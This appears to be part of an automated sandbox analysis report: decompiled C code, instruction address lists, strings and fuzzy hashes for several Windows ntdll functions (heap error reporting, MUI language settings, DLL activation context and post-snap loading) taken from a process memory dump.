						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0186B150("Parameter3: %p\n",  *0x19558ac);
				}
				_t119 =  *0x19558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0186B150();
					} else {
						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19558b4);
					E0186B150("Last known valid blocks: before - %p, after - %p\n",  *0x19558b0);
				} else {
					_t120 =  *0x19558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0186B150();
				} else {
					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0186B150("Stack trace available at %p\n", 0x19558c0);
			}

0x01921c10
0x01921c16
0x01921c1e
0x01921c3d
0x01921c3e
0x01921c20
0x01921c35
0x01921c3a
0x01921c44
0x01921c55
0x01921c5a
0x01921c65
0x01921c67
0x00000000
0x01921c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01921c67
0x01921cdc
0x01921ce5
0x01921d04
0x01921d05
0x01921ce7
0x01921cfc
0x01921d01
0x01921d0b
0x01921d17
0x01921d1f
0x01921d25
0x01921d30
0x01921d4f
0x01921d50
0x01921d32
0x01921d47
0x01921d4c
0x01921d61
0x01921d67
0x01921d68
0x01921d6e
0x01921d79
0x01921d98
0x01921d99
0x01921d7b
0x01921d90
0x01921d95
0x01921daa
0x01921db0
0x01921db1
0x01921db7
0x01921dc2
0x01921de1
0x01921de2
0x01921dc4
0x01921dd9
0x01921dde
0x01921df3
0x01921df9
0x01921dfa
0x01921e00
0x01921e0a
0x01921e13
0x01921e32
0x01921e33
0x01921e15
0x01921e2a
0x01921e2f
0x01921e39
0x01921e4a
0x01921e02
0x01921e02
0x01921e08
0x00000000
0x00000000
0x01921e08
0x01921e5b
0x01921e7a
0x01921e7b
0x01921e5d
0x01921e72
0x01921e77
0x01921e95

Strings

Heap error detected at %p (heap handle %p), xrefs: 01921C50
heap_failure_unknown, xrefs: 01921C75
Parameter3: %p, xrefs: 01921DEE
heap_failure_lfh_bitmap_mismatch, xrefs: 01921CD7
heap_failure_internal, xrefs: 01921C6E
Error code: %d - %s, xrefs: 01921D12
heap_failure_entry_corruption, xrefs: 01921C83
HEAP: , xrefs: 01921C16, 01921C3D, 01921D04, 01921D4F, 01921D98, 01921DE1, 01921E32, 01921E7A
heap_failure_buffer_overrun, xrefs: 01921C98
heap_failure_invalid_argument, xrefs: 01921CAD
heap_failure_generic, xrefs: 01921C7C
heap_failure_usage_after_free, xrefs: 01921CBB
heap_failure_cross_heap_operation, xrefs: 01921CC2
heap_failure_block_not_busy, xrefs: 01921CA6
heap_failure_listentry_corruption, xrefs: 01921CD0
HEAP[%wZ]: , xrefs: 01921C30, 01921CF7, 01921D42, 01921D8B, 01921DD4, 01921E25, 01921E6D
Parameter2: %p, xrefs: 01921DA5
Last known valid blocks: before - %p, after - %p, xrefs: 01921E45
Stack trace available at %p, xrefs: 01921E86
Parameter1: %p, xrefs: 01921D5C
heap_failure_invalid_allocation_type, xrefs: 01921CB4
heap_failure_freelists_corruption, xrefs: 01921CC9
heap_failure_virtual_block_corruption, xrefs: 01921C91
heap_failure_multiple_entries_corruption, xrefs: 01921C8A
heap_failure_buffer_underrun, xrefs: 01921C9F

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: cfde3f585427ac724ff7cd7f037ea698f9f19122459a0a63f8452324579c7e4d
Instruction ID: c3e6156389cc70858896fc364fc68379e0688ee7578a61964e1ca3e523fb3f9b
Opcode Fuzzy Hash: cfde3f585427ac724ff7cd7f037ea698f9f19122459a0a63f8452324579c7e4d
Instruction Fuzzy Hash: BD61E737A15959EFD352EB49D884D30B3E8EB04B35709847AFA0DEB305D6249B50CB1B

Uniqueness

Uniqueness Score: -1.00%

Function 01873D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01873D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01871B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01871B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01871B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01871B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01871B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01884620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E018AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018B1370(_t276, 0x1844e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E018ABB40(0,  &_v68, _t170);
									if(L018743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E018ABB40(_t257,  &_v68, _t243);
								if(L018743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018B1370(_t278, 0x1844e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01884620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E018AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018B1370(_v16, 0x1844e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E018ABB40(_t262,  &_v68, _t244);
								if(L018743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018B1370(_t282, 0x1844e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E018ABB40(_t262,  &_v68, _t201);
							if(L018743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01884620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E018AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018B1370(_t280, 0x1844e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E018ABB40(_t267,  &_v68, _t245);
							if(L018743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018B1370(_t284, 0x1844e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E018ABB40(_t267,  &_v68, _t224);
						if(L018743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01873d3c
0x01873d42
0x01873d44
0x01873d46
0x01873d49
0x01873d4c
0x01873d4f
0x01873d52
0x01873d55
0x01873d58
0x01873d5b
0x01873d5f
0x01873d61
0x01873d66
0x018c8213
0x018c8218
0x01874085
0x01874088
0x0187408e
0x01874094
0x0187409a
0x018740a0
0x018740a6
0x018740a9
0x018740af
0x018740b6
0x018740bd
0x018740bd
0x01873d83
0x018c821f
0x018c8229
0x018c8238
0x018c8238
0x018c823d
0x018c823d
0x01873da0
0x01873daf
0x01873db5
0x01873dba
0x01873dba
0x01873dd4
0x01873e94
0x01873eab
0x01873f6d
0x01873f84
0x0187406b
0x0187406b
0x0187406e
0x0187406e
0x01874070
0x01874074
0x018c8351
0x018c8351
0x0187407a
0x0187407f
0x018c835d
0x018c8370
0x018c8377
0x018c8379
0x018c837c
0x018c837c
0x018c835d
0x00000000
0x0187407f
0x01873f8a
0x01873f8d
0x01873f90
0x01873f95
0x018c830d
0x018c830f
0x01873f9b
0x01873fac
0x01873fae
0x01873fb1
0x01873fb1
0x01873fb6
0x018c8317
0x018c831a
0x00000000
0x01873fbc
0x01873fc1
0x01873fc9
0x01873fd7
0x01873fda
0x01873fdd
0x01874021
0x01874021
0x01874029
0x01874030
0x01874044
0x01874046
0x01874046
0x01874044
0x01874049
0x018c8327
0x018c8334
0x018c8339
0x018c833c
0x0187404f
0x0187404f
0x0187404f
0x01874051
0x01874056
0x01874063
0x01874063
0x01874068
0x00000000
0x01874068
0x01873fdf
0x01873fe2
0x01873fe4
0x01873fe7
0x01873fef
0x01874003
0x01874005
0x01874005
0x0187400c
0x01874013
0x01874016
0x01874017
0x0187401b
0x0187401e
0x00000000
0x0187401e
0x01873fb6
0x01873eb1
0x01873eb4
0x01873eb7
0x01873ebc
0x018c82a9
0x018c82ab
0x01873ec2
0x01873ed3
0x01873ed5
0x01873ed8
0x01873ed8
0x01873edd
0x018c82b3
0x018c82b6
0x00000000
0x01873ee3
0x01873ee8
0x01873eed
0x01873ef0
0x01873ef3
0x01873f02
0x01873f05
0x01873f08
0x018c82c0
0x018c82c3
0x018c82c5
0x018c82c8
0x018c82d0
0x018c82e4
0x018c82e6
0x018c82e6
0x018c82ed
0x018c82f4
0x018c82f7
0x018c82f8
0x018c82fc
0x018c82ff
0x018c82ff
0x01873f0e
0x01873f11
0x01873f16
0x01873f1d
0x01873f31
0x018c8307
0x018c8307
0x01873f31
0x01873f39
0x01873f48
0x01873f4d
0x01873f50
0x01873f50
0x01873f53
0x01873f58
0x01873f65
0x01873f65
0x01873f6a
0x00000000
0x01873f6a
0x01873edd
0x01873dda
0x01873ddd
0x01873de0
0x01873de5
0x018c8245
0x01873deb
0x01873df7
0x01873dfc
0x01873dfe
0x01873e01
0x01873e01
0x01873e06
0x018c824d
0x018c824f
0x018c8254
0x00000000
0x01873e0c
0x01873e11
0x01873e16
0x01873e19
0x01873e29
0x01873e2c
0x01873e2f
0x018c825c
0x018c825f
0x018c8261
0x018c8264
0x018c826c
0x018c8280
0x018c8282
0x018c8282
0x018c8289
0x018c8290
0x018c8293
0x018c8294
0x018c8298
0x018c829b
0x018c829b
0x01873e35
0x01873e38
0x01873e3d
0x01873e44
0x01873e58
0x018c82a3
0x018c82a3
0x01873e58
0x01873e60
0x01873e6f
0x01873e74
0x01873e77
0x01873e77
0x01873e7a
0x01873e7f
0x01873e8c
0x01873e8c
0x01873e91
0x00000000
0x01873e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 01873E97
Kernel-MUI-Number-Allowed, xrefs: 01873D8C
Kernel-MUI-Language-Allowed, xrefs: 01873DC0
WindowsExcludedProcs, xrefs: 01873D6F
Kernel-MUI-Language-SKU, xrefs: 01873F70

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: bb7df455b73a8e667392045300903a00bfe32be1753816d1e09e30a6c50934f4
Instruction ID: 0790ae31f3240f3eafb197f146720027429fa55a84c745f70ccdca5b2f764f79
Opcode Fuzzy Hash: bb7df455b73a8e667392045300903a00bfe32be1753816d1e09e30a6c50934f4
Instruction Fuzzy Hash: F8F12972D40619EBDB12DF98C984AEEBBB9FF19750F15006AE905E7210E734DB01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01898E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01898E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x195d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1958464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1955780 & 0x00000003) != 0) {
							E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1955780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E018AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1957984; // 0x15a2b58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1958464; // 0x73b80110
					 *0x195b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01899B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1955780 & 0x00000005) != 0) {
						_push(_t49);
						E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01898e0f
0x01898e16
0x01898e19
0x01898e1b
0x01898e21
0x01898e7f
0x01898e85
0x018d9354
0x018d936c
0x018d9371
0x018d937b
0x018d9381
0x018d9381
0x018d937b
0x01898e9d
0x01898e9d
0x01898e29
0x01898e2c
0x01898e38
0x01898e3e
0x01898e43
0x01898eb5
0x01898eb9
0x018d92aa
0x018d92af
0x018d92e8
0x018d92e8
0x018d92af
0x01898eb9
0x01898e45
0x01898e53
0x01898e5b
0x01898e5f
0x01898e78
0x01898e78
0x01898e7d
0x01898ec3
0x01898ecd
0x01898ed2
0x01898ed2
0x01898ec5
0x01898ec5
0x00000000
0x01898e7d
0x01898e67
0x01898ea4
0x018d931a
0x00000000
0x00000000
0x018d9320
0x01898ea4
0x01898e70
0x018d9325
0x018d9340
0x018d9345
0x018d9345
0x01898e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 018D933B, 018D9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 018D932A
Querying the active activation context failed with status 0x%08lx, xrefs: 018D9357
LdrpFindDllActivationContext, xrefs: 018D9331, 018D935D

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e1af7fc7dd3a84a8df141140703d25d22af786d66fe28d8bef88c504d0ad8345
Instruction ID: 30a175f3f88484ba2658080601c3e18ad3538f976c4822864e760b7c614fb90c
Opcode Fuzzy Hash: e1af7fc7dd3a84a8df141140703d25d22af786d66fe28d8bef88c504d0ad8345
Instruction Fuzzy Hash: 1B41EC32A0031F9FEF356A5DC8A9A7D77A5B703758F0E4169E904D7192EB746F808381

Uniqueness

Uniqueness Score: -1.00%

Function 01878794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01878794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0187934A() != 0) {
								_t159 = E018EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1955780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E018E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1955780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0187849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01878999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01878999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1955c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1955c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01882280(_t92, 0x19586cc);
															_t94 = E01939DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018961A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1955c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01878A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1955c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1955c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E018AF380(_t136, 0x1841184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01882280(_t108, 0x19586cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018961A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01939D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0187FFB0(_t118, _t156, 0x19586cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E018A9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01878799
0x0187879d
0x018787a1
